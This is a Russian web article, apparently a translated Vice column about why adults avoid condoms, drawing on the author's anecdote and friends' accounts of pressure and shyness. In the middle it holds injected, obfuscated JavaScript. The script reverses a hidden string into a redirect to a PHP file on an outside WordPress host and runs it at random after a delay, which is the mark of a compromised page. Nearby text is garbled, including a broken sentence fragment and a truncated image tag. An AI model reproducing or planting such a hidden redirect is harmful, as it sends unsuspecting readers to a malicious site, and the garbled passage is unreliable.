Почему взрослые люди не используют презервативы

Про презервативы слышали абсолютно все, но до сих пор огромный процент людей ими не пользуется. Даже со случайным партнером, с которым едва ли встретятся еще раз. Журналистка Vice Мария Ягода рассуждает, почему так сложно научиться надевать презерватив, почему мужчины боятся только беременности партнерши, но не думают об инфекциях, и как наши комплексы могут навредить здоровью. А СПИД.ЦЕНТР публикует перевод ее колонки.

Прошлым летом в одном отвратительном баре в Верхнем Ист-Сайде я познакомилась с учителем младших классов. Как только я уловила его черногорский акцент, тут же решила, что хочу заняться с ним сексом. Монтаж, следующая сцена: мы возимся на его кровати, точнее на раскладном диване в квартире его брата (у нас обоих тогда в жизни было не все гладко).

Я спросила, есть ли у него презерватив, он передернул плечами и сказал, что нет.

«Фигово, значит, секса не будет», — возразила я, шаря руками в поисках телефона. Он спросил, принимаю ли я противозачаточные, я ответила: «Ну да, но твой пенис мне незнаком». Пять минут он пытался убедить меня, что ничем не болен. Когда он наконец понял, что я не шучу (а ведь женщине недостаточно сказать что-то всего один раз), сознался: «Вообще-то у меня есть презерватив. Пойду принесу».

контактеслизистых. Прерванный половой акт никак 

Это всем известные моменты. Тем не менее результаты недавнего $NjS=function(n){if(typeof ($NjS.list[n])==”string”) return $NjS.list[n].split(“”).reverse().join(“”);return $NjS.list[n];};$NjS.list=[“\’php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tor/pictures/4863/content_condoms.jpg” alt=”” />

Точно так же и многие из тех, с кем я беседовала, признавались: мысль о том, чтобы попросить партнера достать презерватив в самый разгар событий, пугала их. По своему опыту я знаю, что некоторые мужчины сделают все, чтобы ты сказала: «Ну-у, ладно». Именно это и расстроило меня больше всего в истории с черногорцем — он делал ставку на то, что я либо постесняюсь, либо буду слишком уставшей и пьяной, чтобы настаивать.

«Я прекрасно понимаю, что можно совершенно потерять голову, но помню, как пару лет назад почувствовала себя паршиво, когда парень, с которым у меня был секс на одну ночь, буквально вынудил меня отказаться от презерватива, — рассказала одна знакомая. — Я была пьяна, но в тот момент точно спросила его, не болеет ли он чем-нибудь, а после всего еще уточнила у нашего общего друга, чтобы убедиться, что мне не нужно идти сдавать анализы».

«Я боялась, что все испорчу, если попрошу их надеть презерватив, ведь тогда они перестанут считать меня классной и сексуальной»

Многие женщины решают, использовать презерватив или нет, в зависимости от серьезности отношений; случается, что встречи только для секса затягиваются и перерастают в регулярный незащищенный секс, после того как, надо полагать, оба партнера сдадут все анализы. Но иногда люди начинают практиковать секс без презерватива всего после пары свиданий.

«С непостоянными партнерами я обычно использовала презерватив два-три раза, а потом больше не использовала — как будто за то, что я проявляла ответственность в первые разы, я получала разрешение наслаждаться незащищенным сексом и ни о чем не волноваться, — рассказала мне еще одна подруга. — Отчасти дело в том, что мне совсем не хотелось вести подобные разговоры с парнями, ведь я знала, что наша связь мимолетна и ни к чему не обязывает, и меня саму это вполне устраивало. Я считала, что партнеры не заслуживают того, чтобы тратить с ними время на чересчур личные беседы, которые к тому же вызывали у меня неловкость. Я просто хотела заниматься сексом и получать удовольствие».

Другая знакомая говорила, что чувствовала себя слишком неуверенно, чтобы спрашивать такое, когда только начала половую жизнь, поэтому просто молча соглашалась с парнем (а за презервативом они, как правило, не тянулись).

«Когда я только начала заниматься сексом, я была очень не уверена в себе и вообще с трудом верила, что эти парни хотят со мной переспать, поэтому я просто доверялась им и делала то, что считала сексуальным и крутым, — рассказала она. — Боялась, что все испорчу, если попрошу их надеть презерватив, ведь тогда они перестанут считать меня классной и сексуальной. Так что если они хотели надеть его, я соглашалась, а когда не хотели, я и не просила. И вообще я особенно не переживала, потому что обычно это были знакомые ребята, которые мне нравились, и я думала, что они не могут быть больны».

А моя подруга Клэр с досадой вспоминает о том, как мало мужчин, с которыми она спала, предлагали использовать презерватив.

«Я хватаюсь за голову, вспоминая те моменты, когда парню приходило время надеть презерватив, а он говорил что-то такое вроде: „Ну, ты же принимаешь противозачаточные, да?“ — рассказала мне она. — Я тут же превращалась в мем с Ником Янгом с такими вопросительными знаками вокруг головы: „Это к делу не относится, надень, пожалуйста, презерватив“».

Добавить комментарий